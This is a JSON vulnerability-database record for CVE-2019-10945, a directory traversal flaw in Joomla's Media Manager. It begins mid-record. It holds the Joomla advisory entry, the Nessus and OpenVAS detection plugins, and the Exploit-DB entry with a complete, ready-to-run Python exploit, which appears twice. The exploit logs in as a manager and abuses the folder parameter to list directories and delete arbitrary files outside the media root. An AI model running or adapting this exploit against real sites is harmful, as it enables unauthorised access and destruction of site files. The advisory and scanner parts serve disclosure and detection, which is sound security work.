url, username, password):\n cookie_file = cookies_file_name(url, username, password)\n if os.path.isfile(cookie_file):\n return load_cookies(cookie_file)\n else:\n save_cookies(req_cookie, cookie_file)\n return req_cookie\n\n\ndef traversal(url, username, password, dir=None):\n cookie = get_cookies('', url, username, password)\n url = url + mediaList + dir\n files, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie)\n for file in files:\n print file\n pass\n\n\ndef 
removeFile(baseurl, username, password, dir='', file=''):\n cookie = get_cookies('', baseurl, username, password)\n url = baseurl + mediaList + dir\n link, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie)\n if link:\n link = urllib.unquote(link[0].encode(\"utf8\"))\n link = link.split('folder=')[0]\n link = link.replace(\"folder.delete\", \"file.delete\")\n link = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file\n msg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie)\n if len(msg) == 0:\n print \"ERROR : File does not exist\"\n else:\n print msg\n else:\n print \"ERROR:404 NOT FOUND!!\"\n\n\n@click.group(invoke_without_command=True)\n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True)\n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True)\n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True)\n@click.option('--dir', type=str, help=\"listing directory\")\n@click.option('--rm', type=str, help=\"delete file\")\n@click.pass_context\ndef cli(ctx, url, username, password, dir, rm):\n url = url+\"/\"\n cookie_file = cookies_file_name(url, username, password)\n if not os.path.isfile(cookie_file):\n login(url, username, password)\n if dir is not None:\n dir = dir.lstrip('/')\n dir = dir.rstrip('/')\n dir = \"/\" + dir\n if dir == \"/\" or dir == \"../\" or dir == \"/.\":\n dir = ''\n else:\n dir = ''\n print dir\n if rm is not None:\n removeFile(url, username, password, dir, rm)\n else:\n traversal(url, username, password, dir)\n\n\ncli()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "joomla": [{"lastseen": "2020-12-24T13:21:34", "bulletinFamily": "software", "cvelist": ["CVE-2019-10945"], "description": "The Media Manager component does not properly sanitise the folder parameter, allowing attackers to act outside the media manager root directory.\n", "edition": 3, "modified": "2019-04-08T00:00:00", 
"published": "2019-04-08T00:00:00", "id": "JOOMLA-777", "href": "https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media.html?highlight=WyJleHBsb2l0Il0=", "title": "[20190401] - Core - Directory Traversal in com_media", "type": "joomla", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2019-04-16T15:59:49", "description": "", "published": "2019-04-16T00:00:00", "type": "exploitdb", "title": "Joomla Core 1.5.0 - 3.9.4 - Directory Traversal / Authenticated Arbitrary File Deletion", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-10945"], "modified": "2019-04-16T00:00:00", "id": "EDB-ID:46710", "href": "https://www.exploit-db.com/exploits/46710", "sourceData": "# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Date: 2019-March-13\r\n# Exploit Author: Haboob Team\r\n# Web Site: haboob.sa\r\n# Email: research@haboob.sa\r\n# Software Link: https://www.joomla.org/\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# CVE : CVE-2019-10945\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945\r\n#\r\n# Usage:\r\n# List files in the specified directory:\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory name>\r\n#\r\n# Delete file in specified directory\r\n# python exploit.py --url=http://example.com/administrator --username=<joomla-manager-username> --password=<joomla-manager-password> --dir=<directory to list> --rm=<file name>\r\n\r\n\r\nimport re\r\nimport tempfile\r\nimport pickle\r\nimport os\r\nimport hashlib\r\nimport urllib\r\n\r\ntry:\r\n import click\r\nexcept ImportError:\r\n print(\"module 'click' doesn't exist, type: pip install click\")\r\n exit(0)\r\n\r\ntry:\r\n import requests\r\nexcept ImportError:\r\n print(\"module 'requests' doesn't exist, type: pip install requests\")\r\n 
exit(0)\r\ntry:\r\n import lxml.html\r\nexcept ImportError:\r\n print(\"module 'lxml' doesn't exist, type: pip install lxml\")\r\n exit(0)\r\n\r\nmediaList = \"?option=com_media&view=mediaList&tmpl=component&folder=/..\"\r\n\r\nprint ''' \r\n# Exploit Title: Joomla Core (1.5.0 through 3.9.4) - Directory Traversal && Authenticated Arbitrary File Deletion\r\n# Web Site: Haboob.sa\r\n# Email: research@haboob.sa\r\n# Versions: Joomla 1.5.0 through Joomla 3.9.4\r\n# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10945 \r\n _ _ ____ ____ ____ ____ \r\n| | | | /\\ | _ \\ / __ \\ / __ \\| _ \\ \r\n| |__| | / \\ | |_) | | | | | | | |_) |\r\n| __ | / /\\ \\ | _ <| | | | | | | _ < \r\n| | | |/ ____ \\| |_) | |__| | |__| | |_) |\r\n|_| |_/_/ \\_\\____/ \\____/ \\____/|____/ \r\n \r\n'''\r\nclass URL(click.ParamType):\r\n name = 'url'\r\n regex = re.compile(\r\n r'^(?:http)s?://' # http:// or https://\r\n r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\\.)+(?:[A-Z]{2,6}\\.?|[A-Z0-9-]{2,}\\.?)|' # domain...\r\n r'localhost|' # localhost...\r\n r'\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3})' # ...or ip\r\n r'(?::\\d+)?' 
# optional port\r\n r'(?:/?|[/?]\\S+)$', re.IGNORECASE)\r\n\r\n def convert(self, value, param, ctx):\r\n if not isinstance(value, tuple):\r\n if re.match(self.regex, value) is None:\r\n self.fail('invalid URL (%s)' % value, param, ctx)\r\n return value\r\n\r\n\r\ndef getForm(url, query, cookie=''):\r\n r = requests.get(url, cookies=cookie, timeout=5)\r\n if r.status_code != 200:\r\n print(\"invalid URL: 404 NOT FOUND!!\")\r\n exit(0)\r\n page = r.text.encode('utf-8')\r\n html = lxml.html.fromstring(page)\r\n return html.xpath(query), r.cookies\r\n\r\n\r\ndef login(url, username, password):\r\n csrf, cookie = getForm(url, '//input/@name')\r\n postData = {'username': username, 'passwd': password, 'option': 'com_login', 'task': 'login',\r\n 'return': 'aW5kZXgucGhw', csrf[-1]: 1}\r\n\r\n res = requests.post(url, cookies=cookie.get_dict(), data=postData, allow_redirects=False)\r\n if res.status_code == 200:\r\n html = lxml.html.fromstring(res.text)\r\n msg = html.xpath(\"//div[@class='alert-message']/text()[1]\")\r\n print msg\r\n exit()\r\n else:\r\n get_cookies(res.cookies.get_dict(), url, username, password)\r\n\r\n\r\ndef save_cookies(requests_cookiejar, filename):\r\n with open(filename, 'wb') as f:\r\n pickle.dump(requests_cookiejar, f)\r\n\r\n\r\ndef load_cookies(filename):\r\n with open(filename, 'rb') as f:\r\n return pickle.load(f)\r\n\r\n\r\ndef cookies_file_name(url, username, password):\r\n result = hashlib.md5(str(url) + str(username) + str(password))\r\n _dir = tempfile.gettempdir()\r\n return _dir + \"/\" + result.hexdigest() + \".Jcookie\"\r\n\r\n\r\ndef get_cookies(req_cookie, url, username, password):\r\n cookie_file = cookies_file_name(url, username, password)\r\n if os.path.isfile(cookie_file):\r\n return load_cookies(cookie_file)\r\n else:\r\n save_cookies(req_cookie, cookie_file)\r\n return req_cookie\r\n\r\n\r\ndef traversal(url, username, password, dir=None):\r\n cookie = get_cookies('', url, username, password)\r\n url = url + mediaList + 
dir\r\n files, cookie = getForm(url, \"//input[@name='rm[]']/@value\", cookie)\r\n for file in files:\r\n print file\r\n pass\r\n\r\n\r\ndef removeFile(baseurl, username, password, dir='', file=''):\r\n cookie = get_cookies('', baseurl, username, password)\r\n url = baseurl + mediaList + dir\r\n link, _cookie = getForm(url, \"//a[@target='_top']/@href\", cookie)\r\n if link:\r\n link = urllib.unquote(link[0].encode(\"utf8\"))\r\n link = link.split('folder=')[0]\r\n link = link.replace(\"folder.delete\", \"file.delete\")\r\n link = baseurl + link + \"folder=/..\" + dir + \"&rm[]=\" + file\r\n msg, cookie = getForm(link, \"//div[@class='alert-message']/text()[1]\", cookie)\r\n if len(msg) == 0:\r\n print \"ERROR : File does not exist\"\r\n else:\r\n print msg\r\n else:\r\n print \"ERROR:404 NOT FOUND!!\"\r\n\r\n\r\n@click.group(invoke_without_command=True)\r\n@click.option('--url', type=URL(), help=\"Joomla Administrator URL\", required=True)\r\n@click.option('--username', type=str, help=\"Joomla Manager username\", required=True)\r\n@click.option('--password', type=str, help=\"Joomla Manager password\", required=True)\r\n@click.option('--dir', type=str, help=\"listing directory\")\r\n@click.option('--rm', type=str, help=\"delete file\")\r\n@click.pass_context\r\ndef cli(ctx, url, username, password, dir, rm):\r\n url = url+\"/\"\r\n cookie_file = cookies_file_name(url, username, password)\r\n if not os.path.isfile(cookie_file):\r\n login(url, username, password)\r\n if dir is not None:\r\n dir = dir.lstrip('/')\r\n dir = dir.rstrip('/')\r\n dir = \"/\" + dir\r\n if dir == \"/\" or dir == \"../\" or dir == \"/.\":\r\n dir = ''\r\n else:\r\n dir = ''\r\n print dir\r\n if rm is not None:\r\n removeFile(url, username, password, dir, rm)\r\n else:\r\n traversal(url, username, password, dir)\r\n\r\n\r\ncli()", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/46710"}], "nessus": 
[{"lastseen": "2021-03-01T03:35:35", "description": "According to its self-reported version number, the Joomla! installation running on the remote web server is 1.5.0 or\nlater but prior to 3.9.5. It is, therefore, affected by multiple vulnerabilities:\n\n - A directory traversal vulnerability exists in versions 1.5.0 to 3.9.4 within the Media Manager component \n due to improperly sanitizing the folder parameter. An authenticated, remote attacker can exploit this, by\n sending a URI that contains directory traversal characters, to disclose the contents of files located\n outside of the server's restricted path. (CVE-2019-10945)\n\n - An access control limit bypass exists in versions 3.2.0 to 3.9.4 within the gethelpsites() function of the\n com_users component. An unauthenticated, remote attacker can exploit this and access the 'refresh list of\n helpsites' endpoint. (CVE-2019-10946)\n\n - A cross-site scripting (XSS) vulnerability exists in versions 3.0.0 to 3.9.4 due to improper validation of\n user-supplied input before returning it to users. An unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser\n session.\n\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.", "edition": 20, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-04-09T00:00:00", "title": "Joomla! 
1.5.0 < 3.9.5 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-10946", "CVE-2019-10945"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "JOOMLA_395.NASL", "href": "https://www.tenable.com/plugins/nessus/123954", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123954);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/10/30 13:24:46\");\n\n script_cve_id(\"CVE-2019-10945\", \"CVE-2019-10946\");\n\n script_name(english:\"Joomla! 1.5.0 < 3.9.5 Multiple Vulnerabilities\");\n script_summary(english:\"Checks the version of Joomla!.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Joomla! installation running on the remote web server is 1.5.0 or\nlater but prior to 3.9.5. It is, therefore, affected by multiple vulnerabilities:\n\n - A directory traversal vulnerability exists in versions 1.5.0 to 3.9.4 within the Media Manager component \n due to improperly sanitizing the folder parameter. An authenticated, remote attacker can exploit this, by\n sending a URI that contains directory traversal characters, to disclose the contents of files located\n outside of the server's restricted path. (CVE-2019-10945)\n\n - An access control limit bypass exists in versions 3.2.0 to 3.9.4 within the gethelpsites() function of the\n com_users component. An unauthenticated, remote attacker can exploit this and access the 'refresh list of\n helpsites' endpoint. (CVE-2019-10946)\n\n - A cross-site scripting (XSS) vulnerability exists in versions 3.0.0 to 3.9.4 due to improper validation of\n user-supplied input before returning it to users. 
An unauthenticated, remote attacker can exploit this, by\n convincing a user to click a specially crafted URL, to execute arbitrary script code in a user's browser\n session.\n\n\nNote that Nessus has not attempted to exploit these issues but has instead relied only on the application's\nself-reported version number.\");\n # https://www.joomla.org/announcements/release-news/5764-joomla-3-9-5-release.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fe75ad0e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Joomla! version 3.9.5 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-10945\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"joomla_detect.nasl\");\n script_require_keys(\"installed_sw/Joomla!\", \"www/PHP\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\napp_info = vcf::get_app_info(app:\"Joomla!\", port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"1.5.0\", \"fixed_version\" : \"3.9.5\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE, flags: {xss:true});\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-10-09T14:36:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-11358", "CVE-2019-10946", "CVE-2019-10945"], "description": "Joomla! is prone to multiple vulnerabilities.", "modified": "2019-10-07T00:00:00", "published": "2019-04-15T00:00:00", "id": "OPENVAS:1361412562310113369", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113369", "type": "openvas", "title": "Joomla < 3.9.5 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113369\");\n script_version(\"2019-10-07T14:34:48+0000\");\n script_tag(name:\"last_modification\", value:\"2019-10-07 14:34:48 +0000 (Mon, 07 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-04-15 11:12:47 +0000 (Mon, 15 Apr 2019)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_cve_id(\"CVE-2019-10945\", \"CVE-2019-10946\", \"CVE-2019-11358\");\n\n script_name(\"Joomla < 3.9.5 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"joomla_detect.nasl\");\n script_mandatory_keys(\"joomla/installed\");\n\n script_tag(name:\"summary\", value:\"Joomla! 
is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - The Media Manager component does not properly sanitize the folder parameter,\n allowing attackers to act outside the media manager root directory\n\n - The 'refresh list of helpsites' endpoint of com_users lacks access checks,\n allowing calls from unauthenticated users\n\n - The $.extend method of JQuery is vulnerable to Object.prototype pollution attacks (CVE-2019-11358)\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to access sensitive information\n or execute arbitrary commands.\");\n\n script_tag(name:\"affected\", value:\"Joomla! through version 3.9.4.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.9.5.\");\n\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/777-20190401-core-directory-traversal-in-com-media\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre/778-20190402-core-helpsites-refresh-endpoint-callable-for-unauthenticated-users\");\n script_xref(name:\"URL\", value:\"https://developer.joomla.org/security-centre.html\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:joomla:joomla\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\n\nversion = infos['version'];\npath = infos['location'];\n\nif( version_is_less( version: version, test_version: \"3.9.5\" ) ) {\n report = report_fixed_ver( installed_version: version, fixed_version: \"3.9.5\", install_path: path );\n security_message( data: report, port: port );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}